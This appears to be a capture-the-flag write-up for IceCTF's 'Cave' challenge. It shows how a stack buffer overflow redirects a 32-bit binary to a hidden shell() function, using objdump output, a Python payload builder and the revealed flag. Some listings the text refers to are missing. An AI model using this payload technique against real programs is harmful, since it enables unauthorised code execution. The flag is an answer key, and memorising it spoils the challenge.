Binary Exploitation – 2. Cave
Author: 5k33tz, valrkey
Worth: $50
Description: You stumbled upon a cave! I've heard some caves hold secrets.. can you find the secrets hidden within its depths?
The start of the challenge establishes an SSH connection for you. The only directory you're presented with is one called "cave". Changing into the cave directory shows the following files:
The challenge is nice enough to leave the original source code used to compile the binary:
This appears to be a standard buffer-overflow question, but note that the program never calls the shell() function itself, so we have to redirect execution to it ourselves.
Running the following command we can see that the shell() function is located at a static (non-randomized) address, 0x0804850b:
objdump -d ./shout | grep -A25 shell
0804850b <shell>:
804850b: 55 push %ebp
804850c: 89 e5 mov %esp,%ebp
804850e: 53 push %ebx
804850f: 83 ec 14 sub $0x14,%esp
8048512: e8 29 ff ff ff call 8048440 <__x86.get_pc_thunk.bx>
8048517: 81 c3 e9 1a 00 00 add $0x1ae9,%ebx
804851d: e8 7e fe ff ff call 80483a0 <getegid@plt>
8048522: 89 45 f4 mov %eax,-0xc(%ebp)
8048525: 83 ec 04 sub $0x4,%esp
8048528: ff 75 f4 pushl -0xc(%ebp)
804852b: ff 75 f4 pushl -0xc(%ebp)
804852e: ff 75 f4 pushl -0xc(%ebp)
8048531: e8 ba fe ff ff call 80483f0 <setresgid@plt>
8048536: 83 c4 10 add $0x10,%esp
8048539: 83 ec 0c sub $0xc,%esp
804853c: 8d 83 70 e6 ff ff lea -0x1990(%ebx),%eax
8048542: 50 push %eax
8048543: e8 88 fe ff ff call 80483d0 <system@plt>
8048548: 83 c4 10 add $0x10,%esp
804854b: 90 nop
804854c: 8b 5d fc mov -0x4(%ebp),%ebx
804854f: c9 leave
8048550: c3 ret
Next we confirm that overflowing the buffer results in a segmentation fault:
Then we write the address of the shell() function, as hex bytes in little-endian order, at the position where it overwrites the saved return address. Creating the overflow, spawning our shell, then reading the flag:
Echoing the string worked fine in this case since we were overflowing a small buffer of 16 characters. For larger overflows, you may want to use Python for more powerful string formatting, such as multiplication ("A"*28 yields a string of 28 A's):
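The little-endian encoding and Python string multiplication described above, as an added example that is not part of the original writeup: the shell() address is the one from the objdump output, while the 28-byte offset and the helper names are assumptions for illustration (the real distance from the buffer to the saved return address has to be measured on the binary). The decoder at the end shows which address the saved-return slot would end up holding, and a NUL-byte check flags addresses that string-based input routines would truncate.

```python
import struct

# Values taken from the writeup above; OFFSET is an ASSUMPTION for
# illustration, not a measured value from the binary.
SHELL_ADDR = 0x0804850b   # address of shell() from the objdump output
BUF_SIZE = 16             # size of the overflowed buffer per the writeup
OFFSET = 28               # assumed bytes from buffer start to saved EIP


def le32(addr):
    """Pack a 32-bit address in the little-endian byte order x86 uses in memory."""
    return struct.pack("<I", addr)


def has_nul_byte(addr):
    """String-based input routines stop at NUL, so an address containing 0x00
    would be cut short; 0x0804850b is fine, 0x08048000 would not be."""
    return b"\x00" in le32(addr)


def build_payload(offset, addr):
    """Filler up to the saved return address, then the little-endian target."""
    return b"A" * offset + le32(addr)


def overwritten_return(payload, offset):
    """Decode which address the saved-return slot would hold after the
    overflow, or None if the payload is too short to reach that slot."""
    slot = payload[offset:offset + 4]
    if len(slot) < 4:
        return None
    return struct.unpack("<I", slot)[0]


if __name__ == "__main__":
    payload = build_payload(OFFSET, SHELL_ADDR)
    print(payload.hex())                              # 41414141...0b850408
    print(hex(overwritten_return(payload, OFFSET)))   # 0x804850b
    print(overwritten_return(b"A" * BUF_SIZE, OFFSET))  # None: buffer filled, slot untouched
```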
Flag = IceCTF{i_dont_think_cavemen_overflowed_buffers}